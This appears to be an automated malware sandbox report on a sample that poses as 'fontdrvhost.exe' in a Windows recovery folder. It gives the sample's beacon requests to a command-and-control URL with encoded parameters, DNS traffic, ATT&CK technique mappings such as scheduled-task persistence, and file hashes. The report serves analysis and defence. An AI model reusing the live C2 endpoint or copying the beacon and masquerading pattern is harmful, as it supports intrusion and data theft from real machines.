http://artema1m.beget.tech/L1nc0In.php?jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5&2eb64d735c3ceb3cf44155d276f7f3b6=c881cd7e5eb0b68e0a305909638f2735&c145db2fdebeb12e252b4934f8f5f296=QY2kzN1kDOiBTN5QjNwQzM3EmYmFTMyMTY5ETZmZjNwIzMkVDM2EzN&jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5

http

fontdrvhost.exe

1.2kB
1.3kB
5
4

HTTP Request

GET http://artema1m.beget.tech/L1nc0In.php?jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5&2eb64d735c3ceb3cf44155d276f7f3b6=c881cd7e5eb0b68e0a305909638f2735&c145db2fdebeb12e252b4934f8f5f296=QY2kzN1kDOiBTN5QjNwQzM3EmYmFTMyMTY5ETZmZjNwIzMkVDM2EzN&jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5

HTTP Response

200

HTTP Request

GET http://artema1m.beget.tech/L1nc0In.php?jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5&2eb64d735c3ceb3cf44155d276f7f3b6=c881cd7e5eb0b68e0a305909638f2735&c145db2fdebeb12e252b4934f8f5f296=QY2kzN1kDOiBTN5QjNwQzM3EmYmFTMyMTY5ETZmZjNwIzMkVDM2EzN&jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5

HTTP Response

200
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
16
13
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239339388118_1MQFN52AS0USJY79P&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

tls, http2

191.5kB
5.6MB
4042
4036

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418561_1E2KGQS8IVJEZ1891&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360284735_1J9G8ZRD0Q7KNETKQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418562_1168Q5I7J0C0R4GX2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360284736_11427X8L96F0YA4AW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388117_1JB6V9WCFP6PY54M9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388118_1MQFN52AS0USJY79P&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
148 B
1
1

DNS Request

g.bing.com

DNS Response

150.171.27.10

150.171.28.10
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

76.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

76.32.126.40.in-addr.arpa
8.8.8.8:53

26.35.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

26.35.223.20.in-addr.arpa
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

artema1m.beget.tech

dns

fontdrvhost.exe

65 B
81 B
1
1

DNS Request

artema1m.beget.tech

DNS Response

5.101.153.48
8.8.8.8:53

48.153.101.5.in-addr.arpa

dns

71 B
104 B
1
1

DNS Request

48.153.101.5.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

100.209.201.84.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

100.209.201.84.in-addr.arpa
8.8.8.8:53

22.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.236.111.52.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

205.47.74.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

205.47.74.20.in-addr.arpa
8.8.8.8:53

10.28.171.150.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

10.28.171.150.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scheduled Task

Persistence

Scheduled Task/Job

Scheduled Task

Privilege Escalation

Scheduled Task/Job

Scheduled Task

Defense Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\WindowsRE\fontdrvhost.exe

Filesize
827KB

MD5
759b333fd8d1eedb5666fdea1da25b25

SHA1
b66fc861196561f793062622b88cdb1065e35459

SHA256
7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e

SHA512
831006157773f5a30dbf07dcbfd484f49a978c077f8e132d33c8e044f8141462bb890c344724b23c3144488c1c406d576b7009c1205772a503ce6cc92692aec3

Download Submit
C:\Users\Admin\AppData\Local\Temp\PN219sj1of.bat

Filesize
202B

MD5
d5b643e60a9169e5a5d8e2668ef65370

SHA1
231cf4b480f3109ab43777e53cc5b1a30c608ccf

SHA256
8837ebbde7343868ce357638585c1d83d2eb8236323f3bed775e8c439510d379

SHA512
8b77a70aeb6cdc57866e37ed304b781acf4aaa5600f8348603bf672e4427c7e420dbcebe963c4e30141b540b764d7184b8977534cc294a7586ef5761fe515500

Download Submit
memory/1468-0-0x00007FFBC4243000-0x00007FFBC4245000-memory.dmp

Filesize
8KB

Download
memory/1468-1-0x0000000000810000-0x00000000008E6000-memory.dmp

Filesize
856KB

Download
memory/1468-4-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

Filesize
10.8MB

Download
memory/1468-15-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

Filesize
10.8MB

Download